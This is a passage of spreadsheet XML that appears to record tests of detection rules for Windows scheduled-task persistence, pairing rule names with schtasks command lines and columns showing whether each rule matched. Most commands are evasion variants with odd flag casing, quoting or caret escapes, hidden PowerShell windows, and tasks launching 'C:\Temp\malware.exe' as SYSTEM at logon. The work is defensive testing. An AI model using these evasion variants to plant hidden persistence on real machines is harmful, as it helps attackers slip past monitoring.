      <c r="F1437" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1437" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1437" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1437" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1437" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1437" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1438" ht="15.75" customHeight="1" s="42">
      <c r="A1438" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B1438" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C1438" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D1438" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E1438" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe -"Create" /TN "WinUpdateTask" /TR "powershell -NoPrOfilE -NoNintEracTIVe /"WindowStyle" Hidden -c \" Write-Host 'Test' \"" /SC ONLOGON</t>
        </is>
      </c>
      <c r="F1438" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1438" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1438" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1438" s="43" t="n"/>
      <c r="J1438" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1438" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1439" ht="15.75" customHeight="1" s="42">
      <c r="A1439" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B1439" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C1439" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D1439" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E1439" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /"Create" /tn "WinUpdateTask" /tr "powershell -nop -nONInTERaCTIvE -ws Hidden -c \" Write-Host 'Test' \"" /SC ONLOGON</t>
        </is>
      </c>
      <c r="F1439" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1439" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1439" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1439" s="43" t="n"/>
      <c r="J1439" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1439" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1440" ht="15.75" customHeight="1" s="42">
      <c r="A1440" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B1440" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C1440" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D1440" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E1440" s="43" t="inlineStr">
        <is>
          <t>schtasks.exe -"Create" -"TN" "WinUpdateTask" -"TR" "powershell /"NoProfile" -NonInteractive /"WindowStyle" Hidden -c \" Write-Host 'Test' \"" /sc ONLOGON</t>
        </is>
      </c>
      <c r="F1440" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1440" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1440" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1440" s="43" t="n"/>
      <c r="J1440" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1440" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1441" ht="15.75" customHeight="1" s="42">
      <c r="A1441" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B1441" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C1441" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D1441" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E1441" s="43" t="inlineStr">
        <is>
          <t>schtasks.exe -"Create" /"TN" "WinUpdateTask" /TR "powershell /"NoProfile" -"NonInteractive" -ws Hidden /"Command" \" Write-Host 'Test' \"" /SC ONLOGON</t>
        </is>
      </c>
      <c r="F1441" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1441" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1441" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1441" s="43" t="n"/>
      <c r="J1441" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1441" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1442" ht="15.75" customHeight="1" s="42">
      <c r="A1442" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B1442" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C1442" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D1442" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E1442" s="43" t="inlineStr">
        <is>
          <t>schtasks.exe /CREaTe /tn "WinUpdateTask" /tr "powershell /"NoProfile" -NONInTERactIVE -wiNdOwStYLe Hidden -c \" Write-Host 'Test' \"" /Sc ONLOGON</t>
        </is>
      </c>
      <c r="F1442" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1442" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1442" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1442" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1442" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1442" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1443" ht="15.75" customHeight="1" s="42">
      <c r="A1443" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B1443" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C1443" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D1443" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E1443" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /TN "WinUpdateTask" /"TR" "powershell /"NoProfile" -NonInteractive /"WindowStyle" Hidden -CommAND \" Write-Host 'Test' \"" /SC ONLOGON</t>
        </is>
      </c>
      <c r="F1443" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1443" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1443" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1443" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1443" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1443" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1444" ht="15.75" customHeight="1" s="42">
      <c r="A1444" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B1444" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C1444" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D1444" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E1444" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /TN "WinUpdateTask" /"TR" "powershell -"NoProfile" /"NonInteractive" -ws Hidden /"Command" \" Write-Host 'Test' \"" /sc ONLOGON</t>
        </is>
      </c>
      <c r="F1444" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1444" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1444" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1444" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1444" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1444" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1445" ht="15.75" customHeight="1" s="42">
      <c r="A1445" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B1445" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C1445" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D1445" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E1445" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /CrEATe -"TN" "WinUpdateTask" /TR "powershell -nop -noNInteractIVE -ws Hidden -c \" Write-Host 'Test' \"" /SC ONLOGON</t>
        </is>
      </c>
      <c r="F1445" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1445" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1445" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1445" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1445" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1445" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1446" ht="15.75" customHeight="1" s="42">
      <c r="A1446" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B1446" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C1446" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D1446" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E1446" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /CREAtE /TN "WinUpdateTask" -"TR" "powershell -nOPrOfile -NonInteractive -WInDOWStYlE Hidden -COMMANd \" Write-Host 'Test' \"" /SC ONLOGON</t>
        </is>
      </c>
      <c r="F1446" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1446" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1446" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1446" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1446" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1446" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1447" ht="15.75" customHeight="1" s="42">
      <c r="A1447" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B1447" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C1447" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D1447" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E1447" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /"Create" -"TN" "WinUpdateTask" /"TR" "powershell -NoPROfIlE /"NonInteractive" /"WindowStyle" Hidden -"Command" \" Write-Host 'Test' \"" -"SC" ONLOGON</t>
        </is>
      </c>
      <c r="F1447" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1447" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1447" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1447" s="44" t="n"/>
      <c r="J1447" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1447" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1448" ht="15.75" customHeight="1" s="42">
      <c r="A1448" s="43" t="n"/>
      <c r="B1448" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_change</t>
        </is>
      </c>
      <c r="C1448" s="44" t="inlineStr">
        <is>
          <t>Suspicious Modification Of Scheduled Tasks</t>
        </is>
      </c>
      <c r="D1448" s="44" t="inlineStr">
        <is>
          <t>1c0e41cd-21bb-4433-9acc-4a2cd6367b9b</t>
        </is>
      </c>
      <c r="E1448" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /Change /TN "UpdateTask" /TR "C:\Windows\System32\notepad.exe"</t>
        </is>
      </c>
      <c r="F1448" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1448" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1448" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1448" s="44" t="n"/>
      <c r="J1448" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K1448" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1449" ht="15.75" customHeight="1" s="42">
      <c r="A1449" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B1449" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_creation</t>
        </is>
      </c>
      <c r="C1449" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE</t>
        </is>
      </c>
      <c r="D1449" s="44" t="inlineStr">
        <is>
          <t>92626ddd-662c-49e3-ac59-f6535f12d189</t>
        </is>
      </c>
      <c r="E1449" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe -create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe"</t>
        </is>
      </c>
      <c r="F1449" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1449" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1449" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1449" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98)</t>
        </is>
      </c>
      <c r="J1449" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K1449" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1450" ht="15.75" customHeight="1" s="42">
      <c r="A1450" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B1450" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_creation</t>
        </is>
      </c>
      <c r="C1450" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE</t>
        </is>
      </c>
      <c r="D1450" s="44" t="inlineStr">
        <is>
          <t>92626ddd-662c-49e3-ac59-f6535f12d189</t>
        </is>
      </c>
      <c r="E1450" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe "/create" /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe"</t>
        </is>
      </c>
      <c r="F1450" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1450" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1450" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1450" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98)</t>
        </is>
      </c>
      <c r="J1450" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K1450" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1451" ht="15.75" customHeight="1" s="42">
      <c r="A1451" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B1451" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_creation</t>
        </is>
      </c>
      <c r="C1451" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE</t>
        </is>
      </c>
      <c r="D1451" s="44" t="inlineStr">
        <is>
          <t>92626ddd-662c-49e3-ac59-f6535f12d189</t>
        </is>
      </c>
      <c r="E1451" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c schtasks.exe /cr^eate /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe"</t>
        </is>
      </c>
      <c r="F1451" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1451" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1451" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1451" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1451" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K1451" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1452" ht="15.75" customHeight="1" s="42">
      <c r="A1452" s="43" t="n"/>
      <c r="B1452" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_folder_combos</t>
        </is>
      </c>
      <c r="C1452" s="44" t="inlineStr">
        <is>
          <t>Schtasks From Suspicious Folders</t>
        </is>
      </c>
      <c r="D1452" s="44" t="inlineStr">
        <is>
          <t>8a8379b8-780b-4dbf-b1e9-31c8d112fefb</t>
        </is>
      </c>
      <c r="E1452" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /create /tn "UpdateTask" /tr "C:\Temp\malware.exe" /sc onlogon /ru SYSTEM</t>
        </is>
      </c>
      <c r="F1452" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1452" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1452" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1452" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges (7a02e22e-b885-4404-b38b-1ddc7e65258a); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1452" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1452" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1453" ht="15.75" customHeight="1" s="42">
      <c r="A1453" s="43" t="n"/>
      <c r="B1453" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_folder_combos</t>
        </is>
      </c>
      <c r="C1453" s="44" t="inlineStr">
        <is>
          <t>Schtasks From Suspicious Folders</t>
        </is>
      </c>
      <c r="D1453" s="44" t="inlineStr">
        <is>
          <t>8a8379b8-780b-4dbf-b1e9-31c8d112fefb</t>
        </is>
      </c>
      <c r="E1453" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /create /tn "UpdateTask" /Tr "C:\Temp\malware.exe" /Sc onlogon -"ru" SYSTEM</t>
        </is>
      </c>
      <c r="F1453" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1453" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1453" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1453" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges (7a02e22e-b885-4404-b38b-1ddc7e65258a); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1453" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1453" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1454" ht="15.75" customHeight="1" s="42">
      <c r="A1454" s="43" t="n"/>
      <c r="B1454" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_folder_combos</t>
        </is>
      </c>
      <c r="C1454" s="44" t="inlineStr">
        <is>
          <t>Schtasks From Suspicious Folders</t>
        </is>
      </c>
      <c r="D1454" s="44" t="inlineStr">
        <is>
          <t>8a8379b8-780b-4dbf-b1e9-31c8d112fefb</t>
        </is>
      </c>
      <c r="E1454" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /"create" -"tn" "UpdateTask" /Tr "C:\Temp\malware.exe" /sC onlogon /ru SYSTEM</t>
        </is>
      </c>
      <c r="F1454" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1454" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1454" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1454" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges (7a02e22e-b885-4404-b38b-1ddc7e65258a)</t>
        </is>
      </c>
      <c r="J1454" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1454" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1455" ht="15.75" customHeight="1" s="42">
      <c r="A1455" s="43" t="n"/>
      <c r="B1455" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_folder_combos</t>
        </is>
      </c>
      <c r="C1455" s="44" t="inlineStr">
        <is>
          <t>Schtasks From Suspicious Folders</t>
        </is>
      </c>
      <c r="D1455" s="44" t="inlineStr">
        <is>
          <t>8a8379b8-780b-4dbf-b1e9-31c8d112fefb</t>
        </is>
      </c>
      <c r="E1455" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /create /"tn" "UpdateTask" /TR "C:\Temp\malware.exe" /sc onlogon /RU SYSTEM</t>
        </is>
      </c>
      <c r="F1455" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1455" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1455" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1455" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges (7a02e22e-b885-4404-b38b-1ddc7e65258a); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1455" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1455" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1456" ht="15.75" customHeight="1" s="42">
      <c r="A1456" s="43" t="n"/>
      <c r="B1456" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_folder_combos</t>
        </is>
      </c>
      <c r="C1456" s="44" t="inlineStr">
        <is>
          <t>Schtasks From Suspicious Folders</t>
        </is>
      </c>
      <c r="D1456" s="44" t="inlineStr">
        <is>
          <t>8a8379b8-780b-4dbf-b1e9-31c8d112fefb</t>
        </is>
      </c>
      <c r="E1456" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /create /tN "UpdateTask" /tr "C:\Temp\malware.exe" /"sc" onlogon /ru SYSTEM</t>
        </is>
      </c>
      <c r="F1456" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1456" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1456" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1456" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges (7a02e22e-b885-4404-b38b-1ddc7e65258a); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1456" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1456" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1457" ht="15.75" customHeight="1" s="42">
      <c r="A1457" s="43" t="n"/>
      <c r="B1457" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_folder_combos</t>
        </is>
      </c>
      <c r="C1457" s="44" t="inlineStr">
        <is>
          <t>Schtasks From Suspicious Folders</t>
        </is>
      </c>
      <c r="D1457" s="44" t="inlineStr">
        <is>
          <t>8a8379b8-780b-4dbf-b1e9-31c8d112fefb</t>
        </is>
      </c>
      <c r="E1457" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /"create" /tn "UpdateTask" /tr "C:\Temp\malware.exe" /Sc onlogon /Ru SYSTEM</t>
        </is>
      </c>
      <c r="F1457" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1457" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1457" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1457" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges (7a02e22e-b885-4404-b38b-1ddc7e65258a)</t>
        </is>
      </c>
      <c r="J1457" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1457" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1458" ht="15.75" customHeight="1" s="42">
      <c r="A1458" s="43" t="n"/>
      <c r="B1458" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_folder_combos</t>
        </is>
      </c>
      <c r="C1458" s="44" t="inlineStr">
        <is>
          <t>Schtasks From Suspicious Folders</t>
        </is>
      </c>
      <c r="D1458" s="44" t="inlineStr">
        <is>
          <t>8a8379b8-780b-4dbf-b1e9-31c8d112fefb</t>
        </is>
      </c>
      <c r="E1458" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /cREaTE /tn "UpdateTask" /tr "C:\Temp\malware.exe" /"sc" onlogon /"ru" SYSTEM</t>
        </is>
      </c>
      <c r="F1458" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1458" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1458" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1458" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges (7a02e22e-b885-4404-b38b-1ddc7e65258a); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1458" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1458" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1459" ht="15.75" customHeight="1" s="42">
      <c r="A1459" s="43" t="n"/>
      <c r="B1459" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_folder_combos</t>
        </is>
      </c>
      <c r="C1459" s="44" t="inlineStr">
        <is>
          <t>Schtasks From Suspicious Folders</t>
        </is>
      </c>
      <c r="D1459" s="44" t="inlineStr">
        <is>
          <t>8a8379b8-780b-4dbf-b1e9-31c8d112fefb</t>
        </is>
      </c>
      <c r="E1459" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /creaTe /tn "UpdateTask" /tr "C:\Temp\malware.exe" /"sc" onlogon -"ru" SYSTEM</t>
        </is>
      </c>
      <c r="F1459" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1459" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1459" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1459" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges (7a02e22e-b885-4404-b38b-1ddc7e65258a); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1459" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1459" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1460" ht="15.75" customHeight="1" s="42">
      <c r="A1460" s="43" t="n"/>
      <c r="B1460" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_folder_combos</t>
        </is>
      </c>
      <c r="C1460" s="44" t="inlineStr">
        <is>
          <t>Schtasks From Suspicious Folders</t>
        </is>
      </c>
      <c r="D1460" s="44" t="inlineStr">
        <is>
          <t>8a8379b8-780b-4dbf-b1e9-31c8d112fefb</t>
        </is>
      </c>
      <c r="E1460" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /create -"tn" "UpdateTask" -"tr" "C:\Temp\malware.exe" /sc onlogon /rU SYSTEM</t>
        </is>
      </c>
      <c r="F1460" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1460" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1460" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1460" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Type With High Privileges (7a02e22e-b885-4404-b38b-1ddc7e65258a); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J1460" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1460" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1461" ht="15.75" customHeight="1" s="42">
      <c r="A1461" s="43" t="n"/>
      <c r="B1461" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_folder_combos</t>
